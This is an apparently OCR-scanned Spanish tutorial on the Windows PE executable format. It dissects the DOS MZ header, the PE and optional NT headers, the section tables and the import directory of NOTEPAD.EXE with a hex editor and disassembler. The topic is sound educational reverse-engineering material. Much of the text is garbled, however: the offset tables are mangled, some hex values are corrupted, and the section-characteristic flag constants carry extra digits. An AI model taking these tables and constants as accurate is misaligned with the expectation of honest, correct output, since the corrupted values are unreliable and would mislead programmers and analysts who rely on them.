Veámos la organización en la siguiente tabla: 


PE EXE (Windows 32Bit EXE, DLL, OCX, etc) 


Contiene información necesaria para ejecutar el DOS 
STUB. Conservado por compatibilidad 


Encabezado MZ EXE 


El desol : OFESET) 3Ch 7 Encabezado DOS 
Encabezado MZ extendido esplazamiento ( ) apunta a 
encabezado PE 
Agregado para 


avisar que el 
programa rueda en 
Windows 


Usualmente despliega 'Requires windows to run' o un 
mensaje similar 


DOS STUB 


Encabezado PE Contiene info necesaria para correr el programa en 
Win32 
Contiene info adicional necesaria para correr el O 
Encabezado opcional NT ] P agregados por W32 
programa en Win32 


EEE PEA ., . . . 
Tabla de Objetos o Secciones Información sobre objetos o secciones en el archivo 


Datos de las secciones 


Objetos o secciones Cuerpo del archivo 


El cuerpo del archivo con formato PE se subdivide en un número no fijo de secciones, cada una de las cuales dividida 
también en una tabla de sección, que nos informa sobre el contenido de la sección, y el cuerpo de sus datos. 


Veamos ahora con detenimiento el encabezado. 


RASTROS ARCÁICOS: ENCABEZADO DOS MZ 


Los archivos ejecutables con formato PE inician con el encabezado DOS MZ, que no es más que el antiguo encabezado 
de los archivos EXE más algunos campos adicionales que se agregaron para posibilitar la transición. 


El encabezado DOS, conservado por compatibilidad, es el mismo que empleaban los antiguos programas DOS de 16 bits, 
más unos campos adicionales. Su estructura (en ensamblador) es: 


_IMAGE_DOS_ HEADER STRUC 
SII 
; CAMPOS TRADICIONALES 
SIA LIA AIR II 
e_magic DW ? 

e_cblp DW ? 

e_cp DW ? 

e_crlc DW ? 

e_cparhdr DW ? 

e_minalloc DW ? 

e_maxalloc DW ? 

e_ss DW ? 

e_sp DW ? 

e_csum DW ? 

e_ip DW ? 

e_cs DW ? 

e_lfarlc DW ? 

e_ovno DW ? 
SIA 

; CAMPOS ADICIONALES 
SIA 
e_res DW 4 DUP (?) 

e_oemid DW ? 

e_oeminfo DW ? 

e_res2 DW 10 DUP (?) 

e_lfanew DD ? 

_IMAGE_DOS_ HEADER ENDS 
PIMAGE_DOS_HEADER TYPEDEF NEAR PTR _IMAGE_DOS_ HEADER 


Quien no entienda esta estructura puede orientarse por la siguiente tabla: 


Encabezado EXE MZ 


10000 [Word [ID "MZ - Etiqueta de archivo EXE 
10002 [Word [Número de bytes en la última página o bloque de 512 bytes del ejecutable. 
10004 [Word [Número de todas las páginas de 512 bytes en el ejecutable (incluyendo la última) 
10006 [Word [Número de entradas de la tabla de relocalizaciones 
10008 [Word [Tamaño del encabezado en parágrafos (16 bytes) 


0004 (Word Tamaño mínimo de los parágrafos de memoria localizada por encima del final del programa ya 


cargado en RAM. 

Tamaño máximo de los parágrafos de memoria localizada por encima del final del programa 
000C ¡Word 

ya cargado en RAM. 


000E ¡Word ¡[SS (Stack Segment) relativo al inicio del ejecutable 
0010 ¡Word |SP (Stack Pointer) inicial 


0012 (Word Checksum o 0. Valor de verificación de la suma de las palabras en el ejecutable, usado para 


verificar la validación por posibles datos perdidos. 


0014 ¡Dword ¡CS:IP relativo al inicio del ejecutable (Entry point = Punto de entrada) 
0018 Word Desplazamiento (offset) de la tabla de relocalización. 

40h para los nuevos (NE, LE, LX, W3, PE, etc) ejecutables 
001A [Word ¡Número de traslape (0 = programa principal) 


El primer campo de esta estructura, en el desplazamiento 0000, hay dos caracteres: "MZ", que indican que se trata de un 
archivo ejecutable .EXE. 


Si abrimos con HEX WORKSHOP u otro editor hexadecimal un archivo .EXE de DOS, por ejemplo DEBUG.EXE, 
generalmente ubicado en el directorio CAWINDOWSICOMMAND, veremos en la parte izquierda, en la ventana que 
despliega caracteres en ASCII, que en el desplazamiento 0000 hay dos caracteres: "MZ. Es el número mágico que 
identifica los archivos .EXE. 


A este antiguo encabezado EXE MZ se le han agregado algunos campos que informan al cargador del Sistema Operativo 
(SO) dónde está el encabezado PE con información relevante para W32. 


Encabezado MZ Extendido 


Desplazamiento del nuevo encabezado EXE desde el inicio del archivo o 0 si es un archivo 
003C  [Dword MZ EXE 


El último campo de esta extensión, 'e_Ifanew', indica la dirección donde está la signatura que identifica el formato del 
archivo. Si se trata de un archivo con un programa W32, este campo apunta a dos caracteres: "PE" (Portable Executable), 
el formato elegido por M$ para los archivos con programas W32. 


Si abrimos NOTEPAD.EXE con con HEX WORKSHOP y revisamos el campo e_Ifanew en el desplazamiento 003Ch, 
veremos el número 8000h, que al revés es 0080h, el desplazamiento donde veremos los caracteres 'PE', que identifican el 


formato del archivo (Si trabajas con HEX WORKSHOP, no cierres todavía este archivo). Si ahora abrimos con HEX 
WORKSHOP el archivo WINFILE.EXE, generalmente ubicado en el directorio CAWINDOWS, veremos que el 
desplazamiento 003Ch apunta al desplazamiento 0400h, donde encontramos los caracteres 'NE', que es el formato de los 
archivos W16. 


Inmediatamente después de la signatura hay dos bytes o una palabra (WORD) con ceros, después de los cuales inicia el 
encabezado PE. En la actualidad, el formato NE está practicamente extinguido. Lo pasaré por alto y me concentraré en el 
formato PE. 


Entre el encabezado MZ DOS y la signatura PE, está la seccuón "STUB" del archivo, la cual se incluye para el 
despliegue de un mensaje que indica que el programa sólo puede correr en Windows. 


¿32 BITS?: MÁS CABEZAS 


Dos bytes delante de la signatura se inicia el encabezado PE, cuya estructura es: 


_IMAGE_FILE_HEADER STRUC 

Machine DW ? 

NumberOfSections DW ? ; No. de secciones 

TimeDateStamp DD ? 

PointerToSymbolTable DD ? ; Dir. de la tabla de símbolos 
NumberOfSymbols DD ? ; No. de simbolos 
SizeOfOptionalHeader DW ? ; Tamaño del proximo encabezado 
Characteristics DW ? 

_IMAGE_FILE_HEADER ENDS 


PIMAGE_FILE_HEADER TYPEDEF NEAR PTR _IMAGE_FILE_HEADER 
IMAGE_SIZEOF_FILE_HEADER EQU 20 


Traduzcamos ésta a estructura a una tabla a desplazamientos: 


Encabexado PE 


CPU_TYPE = Tipo de CPU 

0000 - Desconocido 0162 - MIPS I 
0000 [Word 014c - 80386 0163 - MIPS ll 

014d - S0486 0166 - MIPS III 

014e - 80586 


10002 [Word [Número de objetos en la tabla de Objetos 
10004 [Dword Estampa Tiempo 
10008 — [SBytes [Puntero ala tabla de simbolos 
10010 [Word [Tamaño del encabezado siguiente, encabezado opcional NT 


Banderas 
0012 [Word 0 - Imagen del Programa  — 2-EXE 
200 - Dirección fijada 2000 - Librería 


Uno de los campos más importantes de este encabezado es el segundo, en el desplazamiento 0004 desde el inicio del 
encabezado, que indica el número de secciones en el que se divide el ejecutable. Podemos ver en el volcado de 
NOTEPAD.EXE en HEX WORKSHOP, en el desplazamiento 0086h, el valor 0600h, que invertido es O0O06h, el número 
de secciones que hay en el archivo. 


Como dijimos al comienzo, el formato PE divide su contenido en varias secciones con información de tipo específico. El 
campo NumberOfSections indica este número. 


Otro campo que puede ser de utilidad es SizeOfOptionalHeader, que indica el tamaño del encabezado opcional, 
inmediatamente después del encabezado PE. Este valor para NOTEPAD.EXE está en el desplazamiento 94h y es EO00h, 
que invertido es OOEOh=224D, es decir, el encabezado opcional tiene un tamaño de 224 bytes. 


OTRA CABEZA MÁS 


Inmediatamente después inicia el encabezado opcional NT. Randy Katz, en su clásico artículo de 1993, "The Portable 
Executable File Format from Top to Bottom", divide este encabezado opcional en dos partes, una con campos standard y 
otra con campos adicionales: 


_IMAGE_OPTIONAL_HEADER STRUC 

SIA ALI 

; CAMPOS STANDARD 

SILA ALI 

Magic DW ? 

MajorLinkerVersion DB ? 

MinorLinkerVersion DB ? 

SizeOfCode DD ? ; Tamaño del codigo 

SizeOfTnitializedData DD ? ; Tamaño de datos inicializados 
SizeOfUninitializedData DD ? ; Tamaño de datos no inicializados 
AddressOfEntryPoint DD ? ; Dir. virtual del punto de entrada del prog. 
BaseOfCode DD ? ; Dir fisica de la base del cod. 

BaseOfData DD ? ; Dir fisica de los datos 
AAN 

; CAMPOS ADICIONALES NT 
AAA 

ImageBase DD ? ; Dir virtual de la base de la img. 
SectionAlignment DD ?, Alineamiento de secc. 

File Alignment DD ? ; Alinamiento de archivo 
MajorOperatingSystemVersion DW ? 

MinorOperatingS ystemVersion DW ? 

MajorImage Version DW ? 

MinorImageVersion DW ? 

MajorSubsystemVersion DW ? 

MinorSubsystemVersion DW ? 

Reservedl DD ? 

SizeOflmage DD ? ; Espacio reservado en memoria para el archivo 
SizeOfHeaders DD ? ; Tamaño del conjunto de los encabezados 
CheckSum DD ? 


Subsystem DW ? 

DliCharacteristics DW ? 

SizeOfStackReserve DD ? 

SizeOfStackCommit DD ? 

SizeOfHeapReserve DD ? 

Size OfHeapCommit DD ? 

LoaderFlags DD ? 

NumberOfRvaAndSizes DD ? 

DataDirectory_IMAGE_DATA_ DIRECTORY 16 DUP (<> ) ; Tabla de directorios 
_IMAGE OPTIONAL_HEADER ENDS ; de secciones 


PIMAGE_OPTIONAL_HEADER TYPEDEF NEAR PTR _IMAGE_OPTIONAL_HEADER 


A continuación la tabla de desplazamientos equivalentes para esta estructura: 


Encabezado opcional NT 


Campos Estandard 
MO MA RA 
10002 [Word [Versión delenlazador (LINKER) 
10004  [Dword [Tamaño de la sección o segmento de código 
10008  [Dword [Tamaño de la sección de datos inicializados 


0010 Dword Tamaño de la sección de datos no inicializados 
0014 Dreta Dirección virtual del punto de entrada (RVA: Relative Virtual Address) - La 
ejecución comienza aquí. 


10018 [Dword  [Basedela sección de Código 
001C — [Dword  Basedelasección de datos 
Campos Adicionales 
10020 [Dword  Basedela Imagen - inicio de la imagen en la memoria virtual. 
10028  [Dword Alineamiento del Archivo (Potencia de 2 512-64k) 
10032 [Dword Versión requerida de sistema operativo 
MOE A Rea 
10044 — [|Dword [Tamaño dela imagen: espacio reservado en memoria para el archivo. 
10048 Dra ama del naa 
1005C  [Dword ¡Suma de chequeo del archivo 


Subsistema 
005E Word 0 - Desconocido  1- Nativo 
2 - Win GUI 3 - Carácter Win 


0060 Word Banderas DLL 
0064 Dword Memoria reservada para la pila (stack) 


0078 [Dword— trogastas entradas RVA tienen tamaño Dword 


CAMPOS CRÍTICOS DEL ENCABEZADO 


- Tamaño de las secciones - 


Para montar el ejecutable, W32 necesita reservar espacio en memoria. Como hemos adelantado, W32 no divide la 
memoria en segmentos de 64KB como lo hacía DOS sino en secciones de tamaño variable. Los campos SizeOfCode, 
SizeOfTnitializedData y SizeOfUninitializedData, informan el espacio de memoria que el sistema debe reservar para 
cargar cada una de estas secciones. 


Estos valores para NOTEPAD.EXE, tal como puede verse en los desplazamientos 009Ch, OOAO0h y 00A4h, 
respectivamente son 0000 3A00h (tamaño de la sección de código), 0000 4600h (tamaño de la sección de datos 
inicializados) y 0000 0000h (no hay sección de datos no inicializados). 


- Punto de entrada (RVA Entry Point) - 


Otro dato que necesita el sistema para ejecutar el programa en el archivo es el punto de entrada, es decir, la dirección de 
la primera instrucción del programa. Esta información se encuentra en el campo AddressOfEntryPoint, que sigue al 
campo SizeOfUninitializedData del encabezado opcional NT. Para NOTEPAD.EXE este valor, en el desplazamiento 
00A8h, es 0010 0000h, que invertido es 0000 1000h. 


RVA es la abreviatura de Relative Virtual Address, que en español significa Dirección Virtual Relativa. Significa una 
dirección virtual, no real, relativa a la base del archivo. El valor de la base del archivo se encuentra en el campo 
ImageBase (Base de la Imagen). 


- Bases de las secciones - 


Los campos BaseOfCode y BaseOfData indican las direcciones virtuales relativas (RVAs) a la base del archivo de la 
sección de código y de la sección de datos, respectivamente. En NOTEPAD.EXE, estos valores se encuentran en los 
desplazamientos OODACH y O0BOHh y son, respectivamente, 0000 1000h para la sección de código, y 0000 5000h para la 
sección de datos. 


Observa que, para NOTEPAD.EXE, la base del código (BaseOfCode) coincide con el punto de entrada del programa 
(EntryPoint). Quiere decir que el programa inicia en la primera instrucción de la sección de código. 


- Base de la imagen (Image Base) - 


Es la dirección virtual relativa a la base del archivo. Esta información la suministra el campo ImageBase del conjunto de 
campos opcionales del encabezado opcional NT (estructura _IMAGE_OPTIONAL_HEADER). Para NOTEPAD.EXE, 
este valor está en el desplazamiento 00B4h y es 0000 0040, invertido 0040 O0000h. La experiencia dice que este es el 
valor por defecto elegido por los enlazadores como base para los archivos EXE con formato PE. 


Entonces, en el caso de NOTEPAD.EXE, el programa inicia en la dirección virtual Base_de_la_Imagen + 
Punto_de_Entrada: 0040 0000h + 0000 1000h = 0040 1000h. 


Generalmente, 0040 1000h es la dirección virtual de la entrada de los programas en archivos ejecutables con formato PE. 


Esto lo podemos comprobar rápidamente ejecutando NOTEPAD.EXE con el cargador (LOADER) de SICE. Veremos en 
la ventana desplegada por SICE al detenerse en la primera instrucción que el depurador (DEBUGGER) apunta a la 
dirección 00401000h. 


- Alineamientos - 


Para el archivo con formato PE se dan dos alineamientos. El alineamiento de las secciones, campo SectionAlignment, y 
alineamiento de archivo, campo File Alignment. Estos campos son relevantes porque determinan cuanta memoria destina 
el sistema para las secciones y el archivo. 


Los ejecutables W32 no están divididos en segmentos de hasta 64 KB, como en DOS, sino en secciones cuyo tamaño es 
el múltiplo de una página de memoria. El tamaño de una página de memoria es de 4 KB. Si una sección ocupa 8 páginas 
de memoria, su tamaño es de 8*4=32 KB. 


Cada sección del archivo PE es cargada secuencialmente en el espacio de direcciones de un proceso, comenzando en 


ImageBase. El campo SectionAlignment dicta la cantidad mínima de espacio que una sección puede ocupar cuando es 
cargada --es decir, las secciones están alineadas sobre los límtes o fronteras de SectionAlignment. 


El alineamiento de sección no puede ser menor al tamaño de una página (generalmente 4096 bytes en la plataforma x86) 
y debe ser, en todo caso, un múltiplo del tamaño de la página, tal como dicta el manejador de memoria virtual de 
Windows. El enlazador (LINKER) establece un valor de 4096 bytes por defecto, pero esto puede establecerse usando del 
conmutador de enlazador: -ALIGN. 


Por ejemplo, si una sección del programa tiene un tamaño de 1200 bytes, el enlazador asignará a esta sección una página, 
es decir 4096 bytes. Entonces, cuando el programa sea cargado en RAM, el sistema comprometerá una página de 
memoria física para esta sección. 


Para NOTEPAD.EXE, SectionAlignment se encuentra en el desplazamiento OB8h y tiene un valor de 0000 1000h = 
4096 bytes, que es el tamaño de una página. 


El campo File Alignment informa sobre la granularidad mínima de trozos (chunks) de información dentro de la imagen 
antes de ser cargada. Por ejemplo, el enlazador llena con ceros (zero-pads) un cuerpo de sección (datos brutos [raw data] 
para una sección) por encima del límite o frontera más cercana de File Alignment en el archivo. Este valor, 
FileAlignment, está restringido a ser una potencia de 2 entre 512 y 65,535. En el archivo PE, los datos brutos que 
comprenden cada sección deben comenzar en un múltiplo de FileAlignment. El valor por defecto es 512 bytes, 
probablemente para asegurar que las secciones siempre inicien en el comienzo de un sector del disco (un sector de disco 
tiene un tamaño de 512). 


En NOTEPAD.EXE, FileAlignmentse encuentra en el desplazamiento OBCh y tiene un valor de 0000 0200h = 512 bytes. 
- Tamaño de la imagen - 


Otro campo indispensable es SizeOflmage, ya que para montar el archivo W32 necesita reservar espacio en memoria. 
Esta información se encuentra en el campo SizeOfImage. Este valor no es propiamente el tamaño del ejecutable sino la 
cantidad de espacio que se reserva en el espacio de direcciones para cargar el ejecutable. Este número depende bastante 
del valor SectionAlignment. 


Si un archivo tiene seis secciones, alineadas sobre fronteras de 65,536 bytes, el campo SizeOflmage debería ser 6 * 
65.536 = 393.216 bytes (96 páginas). El mismo archivo enlazado con un alineamiento de sección de 4096 bytes (1 
página) debería dar 6 * 4096 = 24576 bytes (6 páginas) en el campo SizeOfImage. Pero esto sólo es así si todas las 
secciones tienen el mismo tamaño. Puede haber secciones con un tamaño mayor al de una página, lo cual cambia el valor 
de SizeOfImage. 


Podemos calcular SizeOflmage para NOTEPAD.EXE. Tiene 6 secciones y su valor SectionAlignement es 1000h = 4096 
bytes, entonces SizeOflmage debería ser 6 * 1000h = 6000h, sin embargo este no es el caso. 


En NOTEPAD.EXE SizeOfImage está en el desplazamiento OODOh, cuyo contenido es DOCO 0000h, que invertido es 
0000 COOOh. Esto es así porque seguramente hay secciones con un tamaño mayor a una página de memoria. 


- Directorio de Datos - 


Al final del encabezado opcional hay un directorio, que ocupa el campo DataDirectory. Se trata de un vector o arreglo 
(array) que guarda las direcciones donde se encuentran las tablas de datos de las secciones del archivo. Cada una de estas 
entradas tiene un tamaño de 8 bytes y se divide en dos campos. El primero indica la dirección virtual relativa a la base 
donde se encuentra la tabla con datos acerca de alguna sección. El otro campo dice el tamaño de la tabla. Cada entrada de 
este directorio tendría entonces la siguiente estructura: 


_IMAGE DATA DIRECTORY STRUC 

VirtualAddress DD ? ; Dirección virtual donde está la tabla 
Size DD ? ; Tamaño de la tabla 
_IMAGE_ DATA DIRECTORY ENDS 


PIMAGE_DATA_DIRECTOR Y TYPEDEF NEAR PTR _IMAGE_DATA_DIRECTORY 


El número de entradas del directorio está indicado en el campo NumberOfRvaAndSizes del encabezado opcional. 
Generalmente este valor es 0000 0010h=16D. El tamaño del directorio de datos sería el valor igual al número de entradas 
por ocho bytes de cada entrada. En este caso es 128 bytes. En NOTEPAD.EXE este valor está en el desplazamiento 
00F4h y contiene 1000 0000, que invertido es 0000 0010h = 16d, es decir, 16 entradas en el directorio de datos. 


De acuerdo al archivo WINNT. H, las siguientes son las entradas del direcorio de datos. 


; Números correspondientes a las entradas del directorio de datos 


IMAGE_DIRECTORY_ENTRY_EXPORT EQU 0 
IMAGE_DIRECTORY_ENTRY_IMPORT EQU 1 
IMAGE_DIRECTORY_ENTRY_RESOURCE EQU 2 
IMAGE_DIRECTORY_ENTRY_EXCEPTION EQU 3 
IMAGE_DIRECTORY_ENTRY_SECURITY EQU 4 
IMAGE_DIRECTORY_ENTRY_BASERELOC EQU 5 
IMAGE_DIRECTORY_ENTRY_DEBUG EQU 6 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT EQU 7 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR EQU 8 
IMAGE_DIRECTORY_ENTRY_TLS EQU 9 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG EQU 10 


El número que se asigna a cada entrada de directorio de datos se emplea para facilitar las rutinas de búsqueda de 
información sobre las secciones. 


VERIFIQUEMOS 


Ahora cerremos HEX WORKSHOP. Tomemos nota de los valores que hemos encontrado. Abramos NOTEPAD.EXE en 
EXESCOPE o en PROCDUMP y comparemos los valores desplegados con los que hemos obtenido hasta ahora. Para 
esta evaluación es mejor usar EXESCOPE ya que muestra el nombre de los encabezados y los desplazamientos donde 
están los datos. 


Comparemos entonces... Nada mal ¿cierto? 


Este proceso de ubicación manual, que puede ser tan engorroso hacerlo de esta manera, lo realiza el cargador de 
Windows de una manera muy rápida y automática. También es el mismo proceso seguido por los volcadores y editores 
de encabezados de archivos PE. 


MÁS CABEZAS ¡HASTA CUÁNDO! 


La información sobre las secciones del archivo PE se encuentra en las tablas de secciones, después del encabezado 
opcional están, ordenadas secuencialmente. Cada una de estas tablas tiene la siguiente estructura: 


_IMAGE_SECTION_HEADER STRUC 

Name DB 8 DUP ( ? ) ; Cadena con el nombre de la sección 
3 

; Misc 

3 

tag$0 <> 

VirtualAddress DD ? 

Size OfRawData DD ? 

PointerToRawData DD ? 

PointerToRelocations DD ? 


PointerToLinenumbers DD ? 
NumberOfRelocations DW ? 
NumberOfLinenumbers DW ? 
Characteristics DD ? 

_IMAGE _SECTION_HEADER ENDS 


PIMAGE_SECTION_HEADER TYPEDEF NEAR PTR _IMAGE_SECTION_HEADER 


tag$0 UNION 
PhysicalAddress DD ? 
VirtualSize DD ? 
tag$0 ENDS 


Espero que ya no se necesite presentar esta estructura con una tabla de desplazamientos. 


El primer campo de la tabla es una arreglo (array) de 8 bytes de largo donde se escribe una cadena de caracteres con el 
nombre de la sección. Sigue una unión con el tamaño virtual de la sección. Luego el campo VirtualAddress es la 
dirección virtual relativa a la base de la imagen donde se encuentra la sección. 


Size OfRawData es el tamaño del FileAlignment relativo al cuerpo de la sección. El tamaño actual del cuerpo de la 
sección será menor o igual al múltiplo de FileAlignment. Una vez que la imagen es cargada dentro del espacio de 
direcciones de un proceso, el tamaño del cuerpo de la sección llega a ser menor o igual a un multiplo de 


SectionAlignment. PROCDUMP despliega este campo bajo el nombre "RAW DATA". 


PointerToRawData es el desplazamiento a la localización del cuerpo de la sección en el archivo. PROCDUMP llama a 
este campo "RAW OFFSET". 


El campo Characteristics indica las propiedades de la sección, es decir, si se trata de código objeto, de datos inicializados 
o no inicializados, si se puede escribir y leer sobre la sección, si es 

ejecutable, si es compartible, etc. PROCDUMP llama a este campo "CHARACTERISTICS". A continuación las 
equivalencias: 


- 0OOO0000020h __Código. 

- 0O00000040h __Datos inicializados. 

- 0OO0000080h __Datos no inicializados. 

- 040000000h __ Sección cacheable. 

- 080000000h __Sección paginable. 

- 100000000h __ Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 800000000h __Se puede escribir en la sección. 


Por ejemplo, si las características es ED000020H, entonces se trata de una sección en la que 


1. se pueden escribir datos 80000000h 
2. se pueden leer datos 40000000h 


3. se pueden compartir datos 10000000h 
4. hay código 00000020h 


E0000020h 
Se trata de una sección con código ejecutable. Esta comúnmente lleva como nombre .text. 
Hay una tabla de estas para cada sección. NOTEPAD.EXE tiene seis secciones, por lo que tiene seis tablas de secciones. 
Abramos de nuevo NOTEPAD.EXE con el editor hexadecimal. 


En NOTEPAD.EXE la primera tabla se encuentra en el desplazamiento 0178h. Visualmente es simple ubicarla con el 
editor hexadecimal ya que cada tabla se inicia con el campo Name, que es un campo de ocho bytes con una cadena de 
caracteres ASCH con el nombre de la sección. El nombre de la primera sección en NOTEPAD.EXE es .text. Es el 
nombre que por defecto se asigna a la sección con código ejecutable. 


Hay varias secciones predefinidas, cuyos nombres son: 


- Sección de código ejecutable: .text 

- Secciones de datos: .bss, .rdata, .data 

- Sección de recursos: .rsrc 

- Sección de datos exportados: .edata 

- Sección de datos importados: .idata 

- Sección de información para depuración: .debug 


"Export" contiene información sobre los nombres que exporta el programa y pueden ser solicitados y usados por otros 
procesos. 


"Import" indica las funciones que el programa solicita a otros; generalmente son funciones que se encuentran en las DLL 
del sistema, donde se encuentran las funciones de la API de Windows, que son incluidas en los prototipos que definen las 
funciones empleadas en el programa. 


"Resources" contiene información sobre los recursos que contiene el programa: menúes, diálogos, iconos, bitmaps, 
cadenas de texto, etc. 


"Debug" es la sección donde el enlazador, si así lo quizo el programador, guarda información para facilitar la depuración 
del programa, con un depurador (debugger). 


El siguiente campo de una entrada del directorio de datos, después del nombre, es una unión con el tamaño de la sección. 
La dirección virtual donde se encuentra la sección está en el campo VirtualAddress. La dirección física de la sección está 
en PointerToRawData. 


TABLAS DE DATOS 


Cada sección tiene una tabla, generalmente al comienzo, con información particular sobre ella. 


Para localizar una tabla de éstas, se determina su dirección virtual relativa (RVA: RELATIVA VIRTUAL ADDRESS). 


Este valor está en el primer campo de la entrada correspondiente en el directorio de datos. Luego se usa esta dirección 
virtual para determinar en cuál sección está. 


La dirección física de la sección nos la dá el campo PointerToRawData de la tabla de sección. La tabla de datos de la 
sección está en un desplazamiento igual al dato en el campo VirtualAddress en la entrada del directorio de datos, al final 
del encabezado opcional, menos el dato del campo VirtualAddress en la tabla de sección correspondiente. Este 
desplazamiento es relativo a la dirección en el campo PointerToRawData. 


Como vimos, las tablas de secciones se encuentran inmediatamente después del directorio de datos, es decir después del 
encabezado opcional. 


Con la dirección física del desplazamiento a la primera tabla de las secciones de la imagen, con el número de secciones 
de la imagen (en el campo NumberOfSection del encabezado PE, la RVA donde inicia la sección, la RVA de la tabla de 
datos de la sección y el puntero a los datos brutos de 

la sección PointerToRawData, puedo localizar donde se hallan los datos que conforman la tabla de datos de una sección. 


Como ilustración localicemos la tabla de la sección de nombres importados .idata en NOTEPAD.EXE. 


Primero buscamos en el directorio de datos la entrada que corresponde a .idata. Es la entrada número 1, es decir, la 
segunda porque la primera es la número O (véase los números correspondientes a las entradas del directorio de datos). En 


NOTEPAD.EXE localizamos esta entrada en el desplazamiento 0100h, que inicia con el campo Virtual Address de la 
entrada del directorio que dice la dirección virtual donde se ubica la tabla de datos de la sección .idata. El valor es 0070 
0000, que invertido es 0000 7000h. 


Luego localizamos el segundo campo de la tabla de sección correspondiente a .idata. Este campo se llama también 
VirtualAddress e indica la dirección virtual donde inicia la sección. Para encontrarlo manualmente, buscamos la cadena 
".idata"; la tabla de sección correspondiente a esta sección inicia en el deplazamiento donde hallamos esa cadena. Este 
campo se ubica, en NOTEPAD.EXE, en O1FO0. El campo Virtual Addres de esta sección estará entonces en O1FC, ya 
que el primer campo, donde está la cadena con el nombre, tiene 8 bytes y el siguiente campo, con el tamaño de la 
sección, tiene 4 bytes. El valor en O1FC es 0000 7000h. Quiere decir que la tabla de datos de la sección se encuentra en 
el inicio de ésta. 


Ya que hemos localizado la tabla de seccción, obtenemos el valor del campo PointerToRawData. Este campo lo 
ubicamos en 0204, y contiene 0042 0000, que invertido es 0000 4200h. Es el desplazamiento del archivo donde están los 
datos brutos de la sección. 


Con estos datos ya podemos localizar la tabla de datos de la sección .idata en NOTEPAD.EXE. Resto la dirección virtual 
de la sección (campo VirtualAddress de la tabla de sección) a la dirección de la tabla de datos de esa sección (campo 
VirtualAddress en el directorio de datos). En este caso, la diferencia es cero: la tabla de datos está al inicio de la sección. 
A la diferencia obtenida le sumo el valor del campo PointerToRawData y obtengo el desplazamiento donde se encuentra 
la tabla de datos de la sección .idata. Como la dirección virtual de la sección coincide con la dirección de su tabla de 
datos, el desplazamiento dentro del archivo, donde se encuentra la tabla de datos de la sección .idata, coincide el valor en 
PointerToRawData: 4200h. 


Puede parecer un proceso muy complejo. Pero basta imaginar lo que significaría que el cargador del SO tuviera que 
buscar de manera secuencial en un ejecutable de 3.2 MB, por ejemplo, qué funciones el programa importa de las librerías 
DLL del sistema. 


Bien, ahora que hemos localizado la tabla de datos de la sección, podemos buscar en ella los nombres importados. 


La tabla de datos de la sección de datos importados tiene también una estructura de directorio, es decir, es una tabla con 


varias entradas con la misma estructura cada una. Por este motivo podemos llamar a esta tabla Directorio de Datos 
Importados, cuyas entradas tienen la siguiente estructura, que llamamos IMAGE_IMPORT_DESCRIPTOR: 


IMAGE_IMPORT_DESCRIPTOR struc 
dwRVAFunctionNameList DWORD ? ; 
TimeDateStamp DWORD ?; 
ForwarderChain DWORD ?; 
dwRVAModuleName DWORD ?; 
dwRVAFunctionAddressList DWORD ?2; 
IMAGE _IMPORT_DESCRIPTOR ends 


PIMAGE_IMAGE_IMPORT_DESCRIPTOR TYPEDEF PTRIMAGE_IMPORT_DESCRIPTOR 


Hay tantas entradas de este tipo como módulos importados sean importados. Es decir, hay una entrada ImportDirectory 
para cada módulo importado. 


El primer campo, dwRVAFunctionNameList, apunta a un arreglo (array) de punteros a estructuras llamadsa 
IMAGE_IMPORT_BY_NAME, que son las listas con los nombres y ordinales de las funciones a usar del módulo 
importado. 


TimeDateStamp indica cuando el archivo fue fabricado. 


Uno de los campos importantes de esta estructura es dwRV AModuleName, una dirección virtual relativa a la base que 
apunta al nombre del módulo importado. 


Si resto al valor de dwRV AModuleName la dirección virtual de la sección, obtengo el desplazamiento desde el inicio de 
la sección. 


En NOTEPAD.EXE, el campo dwRV AModuleName está en el desplazamiento 4200h + 4 + 4 + 4 = 420Ch, y contiene 
E874 0000, que invertido es 0000 74E8h. La dirección virtual de la sección .idata es 7000h. Entonces el nombre del 
primer módulo importado se encuentra en: 


0000 74E8h - 0000 70000h = 0000 04E8h + 0000 4200h = 0000 46E8h. 


En el desplazamiento 46E8h encuentro una cadena con el primer módulo importado por NOTEPAD.EXE: Shel132.dll. 
Este nombre estará antecedido por el nombre de una de las funciones importadas del módulo y estará seguido por las 
demás funciones. 


El campo dwRVAFunctionNameList apunta a la lista de punteros a los nombres de las funciones importadas en el 
módulo. Confirmemos esto en NOTEPAD.EXE. 


El campo dwRVAFunctionNameList está en 4200h y contiene 0000 7160h, lo que indica que la lista de punteros a 
nombres importados del módulo correspondiente está en: 


0000 7160h - 0000 70000h = 0000 0160h + 4200h = 0000 4360h. 


El valor en este desplazamiento es 000 74D8. Es la dirección virtual de la lista de nombres: 


0000 74D8 - 0000 7000 = 0000 04D8h + 4200h = 0000 46D8h. 


Si vamos a esta dirección encontraremos que contiene el número 004Eh, seguido por la cadena 'ShellExecuteA"'. El 
primer número es el ordinal de exportación de la función con que inicia la lista de nombres importados del módulo, y la 
cadena es el nombre de la función. El ordinal es un número de referencia que puedo emplear para llamar a la función 
importada si no poseo su nombre. 


El campo dwRVAFunctionAddressList es sumamente importante. Apunta también a un arreglo (array) donde el cargador 
de W32 coloca la dirección virtual del punto de entrada de la función importada. Esto es de sumo interés: cuando el 
cargador monta el programa en RAM llena este arreglo con las direcciones virtuales donde inician las funciones 
importadas. Cuando el programa llama a una de estas funciones lo hace indirectamente a través de una llamada como 
esta: 


¡mp [RVA del THUNK] 


El campo dwRVAFunctionAddressList está, en NOTEPAD, en 0000 4210h, y contiene el valor 0000 7370h, ya 
invertido. Quiere decir que apunta a: 


7370 - 7000 = 0370 + 4200 = 4570h : <-- dwRVAFunctionAddressList 
Anota este número. 
Ahora fíjate. Desensambla NOTEPAD.EXE con W32DASM. Busca la cadena "ShellExecuteA" hasta llegar a: 


* Reference To: SHELL32.ShellExecuteA, Ord:004Eh | 
:00402DEE FF1570734000 Call dword ptr [00407370] 


Es una típica llamada a una función API de W32. Tiene la forma "CALL DWORD PTR [THUNK RVA]. "THUNK 
RVA" es la RVA donde el cargador de W32 coloca la dirección virtual donde inicia la función importada en el espacio 
de direcciones del proceso. Si con un programa como OFFSET (de Ieczelion) o OFFCAL (de MrCrimson) revisas el 
desplazamiento en el archivo que corresponde a la dirección de memoria 00407370, verás que esta dirección corresponde 
al desplazamiento 000 4570h, el mismo apuntado por el campo dwRVAFunctionAddressList correspondiente a la 


información sobre "ShellExecuteA”. 


